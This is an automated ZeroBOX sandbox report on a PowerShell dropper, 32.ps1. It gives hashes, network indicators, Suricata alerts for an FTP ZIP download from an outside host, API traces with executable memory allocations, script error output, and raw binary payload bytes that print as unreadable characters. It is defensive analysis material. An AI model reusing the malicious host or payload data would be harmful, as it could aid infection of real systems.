Summary | ZeroBOX

32.ps1

Generic Malware Antivirus ZIP Format
Category Machine Started Completed
FILE s1_win7_x6401 Feb. 5, 2025, 11:01 a.m. Feb. 5, 2025, 11:05 a.m.
Size 1.0KB
Type ASCII text
MD5 7de4a17dfc66695461f0c6a70ca4ec49
SHA256 ee5775b3e3d293257a13bbed6b04a273deb4b92ab32c06b25228c2d581c52523
CRC32 F14A89E3
ssdeep 24:VU79N1K28Tm1K2n5gn4d1K2N85m9yRuifVAeABvQ1K22ft3vSO:eT1KPm1KId1KStyRuifbAS1KltSO
Yara None matched

IP Address Status Action
164.124.101.2 Active Moloch
167.86.109.19 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 167.86.109.19:21 -> 192.168.56.101:49163 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 167.86.109.19:33518 -> 192.168.56.101:49164 2035482 ET HUNTING ZIP file download over raw TCP Misc activity
TCP 192.168.56.101:49164 -> 167.86.109.19:33518 2260003 SURICATA Applayer Protocol detection skipped Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Add-Type : Cannot add type. The assembly 'System.IO.Compression.FileSystem' cou
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: ld not be found.
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\32.ps1:15 char:9
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + Add-Type <<<< -AssemblyName System.IO.Compression.FileSystem
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ObjectNotFound: (System.IO.Compression.FileSyste
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: m:String) [Add-Type], Exception
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : ASSEMBLY_NOT_FOUND,Microsoft.PowerShell.Commands
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: .AddTypeCommand
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: Add-Type : Cannot add type. One or more required assemblies are missing.
console_handle: 0x00000097
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\32.ps1:15 char:9
console_handle: 0x000000a3
1 1 0

WriteConsoleW

buffer: + Add-Type <<<< -AssemblyName System.IO.Compression.FileSystem
console_handle: 0x000000af
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidData: (:) [Add-Type], InvalidOperationExc
console_handle: 0x000000bb
1 1 0

WriteConsoleW

buffer: eption
console_handle: 0x000000c7
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : ASSEMBLY_LOAD_ERRORS,Microsoft.PowerShell.Comman
console_handle: 0x000000d3
1 1 0

WriteConsoleW

buffer: ds.AddTypeCommand
console_handle: 0x000000df
1 1 0

WriteConsoleW

buffer: Unable to find type [System.IO.Compression.ZipFile]: make sure that the assembl
console_handle: 0x000000ff
1 1 0

WriteConsoleW

buffer: y containing this type is loaded.
console_handle: 0x0000010b
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\32.ps1:16 char:32
console_handle: 0x00000117
1 1 0

WriteConsoleW

buffer: + [System.IO.Compression.ZipFile] <<<< ::ExtractToDirectory($r, $g)
console_handle: 0x00000123
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (System.IO.Compression.ZipFile
console_handle: 0x0000012f
1 1 0

WriteConsoleW

buffer: :String) [], RuntimeException
console_handle: 0x0000013b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : TypeNotFound
console_handle: 0x00000147
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\32.ps1 : Executable not found in extracted f
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: older.
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorExcep
console_handle: 0x0000017f
1 1 0

WriteConsoleW

buffer: tion
console_handle: 0x0000018b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio
console_handle: 0x00000197
1 1 0

WriteConsoleW

buffer: n,32.ps1
console_handle: 0x000001a3
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004f2290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004f2290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004f2290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004f2290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004f2290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004f2290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004f2290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004f2290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004f2290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004f2290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004f2290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02679000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02739000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05461000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 262144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x063f0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x063f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x063f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x063f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05476000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05477000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05478000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x063f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received 220 Microsoft FTP Service
Data received 331 Password required
Data received 230 User logged in.
Data received 200 OPTS UTF8 command successful - UTF8 encoding now ON.
Data received 257 "/" is current directory.
Data received 250 CWD command successful.
Data received 200 Type set to I.
Data received 227 Entering Passive Mode (167,86,109,19,130,238).
Data received 150 Opening BINARY mode data connection.
Data received 7,-ý<ÆS…‡G•1œ…”æâ±ÆàüKGV÷%õ¯$\œ_RԈæ䋎å_~_üC³óm"8ÿ2)óPwñ’n\C%À÷Ë"húÆK/CØ´ˆNøù6ٕ0E¹-Zm*Á`ºðÿ8{Ost¦ýß÷È\„rþÒ叨J7Ÿ™‹Í•Å¯z£#‰™É¬®Ä²òÙ¨fhú×|˔ª“¸Ì,ŸbHXc½sHæ¨_UµWx´áKèÝÑ-˜á>©õñÝ¦å …–&&ý|ùô~^dÉT¹TÛÌw©ØáDEO­»À* ;ÿc &ÅíìyN[5 `ýlüÌ þU»0ÓÕ¢‡”\\=•;·,A³Æ.| øªIwº/ÿ/!*ê-M¯0·8ଢ଼¨"ŸDE¶¿ùÈ|è\raµ[WGp³â¾kà(»¿»wSs³µ³C¿”±€[ÿ¬?¤Áäìüä²ð5îªÃ+ Þïïp¹Ý?ýÿªð¢LÊ¬²=1Z ›ÿæ“$Uÿ;ÿíXÛᦞ€øFJP}ð·R›£ܧ+·ßXUqÐzßô-ºlH.ž<¬ÿøoyð‡ÑùÊå10þËVü w껶ÿ#;¸!×c¨”½÷™‹SgÃX®åEó®Pqk[v¼Ӛ{dlþe¾‹wJWVÿ&j´c¤-·×²Kûà1A½f !•fõ¿KÞ¢©=ûŠ²? 懨Ìó5–Vÿpofl”Z©µ+ááêýL—¥~ YXƒ$ˆ¥vØ?´%™{‹®qD̛¡ÄòžM÷µ6Ç;nEžú‘JÊBæ¼BÀi–ŸŸø÷ažy57VÃf¿‰¦êùÄ"êó è?²ý§ÎΗlÑxVŒÑø™>l'nò[›~ßa0ß,3þŶL4Å쁯ž¿…ÕVٚ°Ïy"rcÐQꃞ·‹óv)T£U9¿ ¥Ï–›^ÿѧ¿µ 4šÈŽµRQz¶Ëûø%ƒv4Qù´:CñtB$ßÌo•Ü¬§£h ÿQƒO aC˜PX…°õÎþČd=‰óþ #¶ñ*à<L°è ¶ˆRïƒõ¿9cLm=ÞK£ƒù÷˜t%– ùÕ×¢UÞã'Wmí%¦Ô'«³s™Öwå{êO‹ h4‘ŠE úx5ÇRj.[Z;£H~ׂvÑ˶{¾¹æpHž¬ 9ò¹ @Õ¿~P«G(¹O_Í)ðAÌ¿"㴍FwÜïbˆTÆvzª5TØÝiè³1ô-ìù›€ç_Ï'9R±Íi»«S›ðª'÷…¾p¬5lýZ» û1%¸IöŒFñ%ଉ¶tWì‰×<üѲ ù‰$óßùg¥¼…Ŷ ìýÖôY6¢W ːðpöӔñnðÇ·Ö£t†-qýÏ\ÑÞ)_àñ'þÓÀÆìÉÈ F³‘GÏ˄Z¾*4ºRã§C'ksÓ9åãêl¥/üßÑÙ­à~B}ô—ÿ҇/ŽwÏfM‘Cr»àÌJ½¨ :ãóŠÝlHÏØl€´âY€û¯àýûOñîㅖ©ÑÑêàbú‡8fÌu´†¤A°~i{9^QNѶòWƒ¹[;÷õßÀøþÝ©µpð”3¢åN¾'à»À£{¦š¶øz“D@ðmŽ0JU·,Kwr+´ 6ÿÌJqˆ¤uI[­0ã!ù- îz$ûIj†j8°Çv6ÓVAC9Aã˜'ðYq$xø?Ü`þ×ÀtðÙ×\ÀÿsþüMŸM ögßáêüBÉtɲ.gá„&çøË%*I8¸{þÅ$º/îãf…ÙpþcMƒþ‡tô8ÿjÒ¡þ'Ük€e»ƒmËÂ}ÿü©¹AT-,ÉíOt IÖ?|ôB}xø?–6Â~…/TÏU­ÔllìH–½} êEúi J¥Bê£ââ"º-CÚT-õÞ7ê5ÓLpm$߯–Û…:{»»ƒz’Ì?ý3o8å0'§ ûáÚà?:}gö¤:0ý³Ýxo^_¸­—„n(ýƒMJ@˜¶³yä„CN*¾± í½¸ôwþ䶹‘ÈÇöêûPkײ;7OûÂ4tmq)YÝ՘>Og¸J ¾ÿÅsùMnš þyò½æ"­¥µïcí0DÿZ6TXVî*øÂ7ÍÈà ðÏÆãNš|Ówtp·PLwÈÂü z6¶¿ÌIõ<Œãÿä£Ã‰®ž¾ÆD{ꑁ>4ô?]‘DÔõZ¾Õðk+º‹ˆ²u¦½œ–Í-ýÏwT:bDÙ£ê ¬|éžåÉXyWCÃxØúŸ¬¢\ÔÊmCõ„$P·¨nÅßoìCIPOö!¿lŸX“ÀE®þ×édt{'Ùr.Îæö´ þ󟐳]u4ô‡>ò[ÐÙÁá‘09cWÎF™Å «€`í\ñè€ÑsPÿXtÄîýÃ:øŸçŸþ®€¨êjMæT뽑€äŒFTWtËøüÁq¾DˆŽ‚º‚þgÐit°ž©ÑîÓ/>؅Ñ1£?Û'bž@ì>nƁþ§1¡•‹ÑgÐÿm7´™|ëä ÇJ ø·½ŠZõ õ,"òjnEÙ9ô!ùDK5eªC·ë{þ“î3íÔ@ÿ²æ¹ÎW±å]\üê…àþ'¡îõpùÞð(ûª€ÿPƒ_]QEz„û¾hǜ҄ƒØ”jô¿w{ÒÒ÷÷ÿ]JW8ÇuÒƒ‡á5ü=KM‡(ëU¸Í¬+¥vÁý'±ÔÿÛnB»`þ=»±¿¬¤ð¯„û¸4fSæ÷ÿ³Lràxÿû„öÿ úÐa?(ÈßãðrÃ'=ãUš]ß&àP¬ÇZa'‘OÆxã«ýOô‰Ä¦ßã $ѳ˜ÉÉ{ý@^^fm]:›~¡‘µ‘½½ŽFoæ«,Ô佪m)ŒÿK›0Ëÿœ^aðïF5jû"£yƎՊú„Pi'±X±<[¨Ý²xs£ÿØÞÃäɲªRP|Þ±}¹fQ¿°›$Ô%¾…q øÙjwû¡¦(_dš4O‰ >Ö¬6<-(ˆgæfu®KֶʔvÎÅz“e†ý3"ùoÙ*€‚QÊBžókì©è¸šŽ@‰ÁhÀÿ •#µ»Œ£}Fæ†ëùâ“9á>‚Þz6¶Ëî«$žØÚàþK4eèÉfgûKϦ†²a­ù¡÷„aþ¯ñ¤¼½œkŒÌUñG ú@HøyÎï¨'ÐúëČý­Y;+¤>õ0A]_³K¼~Ëpàöð<Ž¯BÊ¿RœÎ8‚þÿj}Óã » ÿ…bB=mw|˜½™C€ñŸ#Ä°Þ@ 5Gǁ˜5‡’  `cÖŌZª%P´ñ’¼0[l4›mJ[ D·© øϦ yÇSX “¨jS|RW€ÿìÒ¸Úþp´`v8"ì’%3ã¢'Èÿ7WpÂÅ2èÿRæFM'Ä®nBÿÙ òœCv‡´†ø ýf~OŒÎZ½QvÀ¿ùá«Á|+Íwœ¦pˆ$"úúÏw)¹†æ‹µ<¡ÈÇJïhÅÿ™jFO H¤Ì›úàŒ]”&D'²"OîüOYYøçö¨ÎßÏ,òŽ³1OÞýgÏöe"ÄX‹(~AŸLBb“ùó²h?÷»ë›½ØË³Ï#ȦÆXš,ï_µt…sþõ7¡`5êßOÇ|ئóÿc)Oc~2_kºè¿ã* Ó°óÿçžÿ×£ø…NÞÒÞîø‹“Ë™ûóCAg‚øú0ý'öþÓ}@±Bُþç„Û„ëäCÀ¿^~l
Data received 3¢TÏ°®AæÀu{‚&îM.=$îWó°Á'û-úßW¿í¢My?6k`—µzVë-õzÐãAςž•ú}ì}çöžÛídËéõ–ÔÙP©w¤9ê}P}Ë5Kç a\ɅÑuâK•X.©l¯„I¥kGw m’n• ÿ†3«¸EèƒîB]æ)¨¹—ü7èÊ4΍ð›Qyk+q ëéê^_¸s¶ç—êçêó™8ù«°Ú¹Û) õäæQNÝXT++ï“çćívNÛþHÿ3SŽÞ½½ä®°5ÑËÕÿ¾ú·–ÿkMÏõG¶|Ú{a_—“.õ¼•|ãà³öïN¼‰ýv0©\ҐïGSZ¦hÉü¸›Z!->ãEÖÂ̬ÜÛù?r{åw@Žöל]Yº Ãϯ_.~øé/ “²“¯þŽÎ¥óžÚ?º—úw{èê\¾î©i³™1_70ý6FÛ¼º$]:ãÛ©‡8vê´½ÚkxВš;†¯~㏠¿ÊLl4¬GÍÝQM¢šFoª0¹Æ…Æ·ÛFן|húìÉ¿etÒÉßñE§?º–ìÞ¢o¥nÚlº£Ú³j¦–U.\kð¯6WmT9¹BÍz·­êÃöíÒ­|‡2Mԧ꼯úW兕GWÞZ©yåÈò+⛗º_êPx÷༠¨»²Í/ŽßÚüI?nÎöTíÞ§E/‹=iõôý5úǬŸ½Óz§ÝOÉNÎøÒôÃý‹?y¾Œü–ýmÚ÷·I›’?K§Û2eø~uMûþ¶Ë•j§ÂOß»Öðþ’'lâôÃރÄâÿûé¸|èÆ9›ën>¹Ñ¸Ñ½#w_¥C³õ8n?Þâoê¢vQ:·ùâ·«ÂáúÔV>ûýŒÿ6öGZjÌ¹Æ´ú) ¿Y¾výº+åD괂u|Gú59ÔV5tiðºÈÑ%]%n„] ˆéë`ÃPPö—C=Dé>ì ÜñÖÖäÕóãƒj–œ\6´R‹ +m«1¸*ÑnϠʍ 6npĐG“¶O)sªßÔÖÙÍúÖNªQXû{³Þ©>›úšÆ͞X4ùÿ®HÕþ\;wôŒêÓ#&õš°qüòQ‡Ù‡\Ô°obŸæ=õ]R;Ïiÿ«õŽ–ï[4]\¿omkø~$×e~‰þ_)¡]é!Ñ¢gÛւ1ßF­ ­§~ëZsMW̓tٙ~wúÈ÷3>ù.¿ÙßãHü¹³Oü™Æÿöß±Ói‹“}]ñ¥|ҁԡã.ºðeeÛ%Û?~òø)ygÇÆuKþçz×\utÏÚ¿ÎνXé¬tŠ<Øk÷ª]ÃwÐ{Xr4ã\ҙ_ºgnȹQÈgK:øåôç‹ßÇ']IŽÊ(ÌÛÁ§GµNX^jxXênú§-¹cêx¢ ªo©ÒuŽ•¿ޜí‘Rô1àCÖçKŽþþueúušÚ!zÈãá'úɝ|¡k¤ È151Ut}é ¹”xiö+<*af©¼€NÆο Vً|«Èܓ’Æ:}ê*­q•©6ò}\|‹ò?:\íhoy¦*_ávÅ=µ;´ø«ùœzͪ]ª¹»FZû9CFÞþ¯ÌéâÄþ Ýzw~Ýãû°á£ä!¯»ÿn´¬þÖ²q±ŸKÇÆ÷IxVvI…?ê~iR¯iRÓ1 ÛÔ©V{ã1ÍȦµgלPYW¾yÜÒ¸÷¡•C§”ó¯ÈM%ö9ëïlQ¡íÊýQyfù¢xG„Îù3Cõ«‘À“‹¹‘jD§°?C:狏yۏ®i;sýÊp·-÷ò«Ã;›mݱàDÕÛW‘7kœ?uîêUããùϟ§¬ùÑûÇéo!÷Í7vìþ¯û²÷PÚ½-ObžÝýruÏÕ­×^û˜Xûö±»ï~5üYßÇ1·^{rµÂݍ}ÒûQÚÅâ#SÍÞÙf_¿£¥ŽLٞ³uúºaë{lÖ5^{ûhä£ç‰Ÿ}Â{ôøœ×ë¿x7¸è}îºïwîÌNœuŽ¸Ë=<áð£åX¿Ù%O-Bî–ô9¢Oõö•#Ê6,50feôä¸úq}£{žŠ²%ÖÜÑ8®Cqï¹}šuûÖkJ‡7mÚ~fµ}óýÃâ/ÇòôD…j½‡5šW³b™û1ƒ‡[:ZSÙudKӐõKŽì9fÇÜE’†|k6\ŸIĤ¯x{ñCaÊü¬ù-í„÷¾l¤^ÿ,Y%jjìåjjõ?ë]hØ­SýFôKð&ÌÔãöèÊåëµ7t*h; ]¥VË:Ký.õ©ÙËÓ =*,r¾ôG+5]NéœÖ1§Ðy‡Ÿx·ä·Ïé_§õ%B*lk; _«žÍºŒn¶°¦Ñ1ð~ð1ãgïßû¢ÚüpõX”¯l«„‘±+Í÷5›p-}ί´$÷°QÁ•¯Wû;¾Rô<ó¸¨}~›6ž¬LŒqÛ c2.~ü}Zn„ØеÚ9çÝËçƒ_ŸpÎ ¸]6ºK¥#U¬•VþVöm™e•êÔ_[ÿQ³~;Õ¯S½t¤z“êͨš÷.<Mrsu–Ð ¢t¹F{ïðwËyÕ—ÿ3°³mbDq¥?ª“5Âc‡S+ä[žªÒԀŒMyÔXm¯°OË6 =œpU¿Ik­ÈD©ehµð͙T*JË-¶ðìš/ß0Oö<øº²˜WYku¦EQªÄCÛüÔ}O¢þƒ»3Šñßãøìû>Ó4S¡}ߥMZ,)’Ò/û–„,7ûý…-Y.ÙIH’„PTHH…hß÷©Ù·gfîç®ÿÝsî9÷þqÏ=sÒ gN==Ïóý>ßïûýz•…½}QíXOêjÔç°,¹óœ*z­~ ¤/pÜËaõ‚æ÷ƆÏLÚcoV̯àUð ö 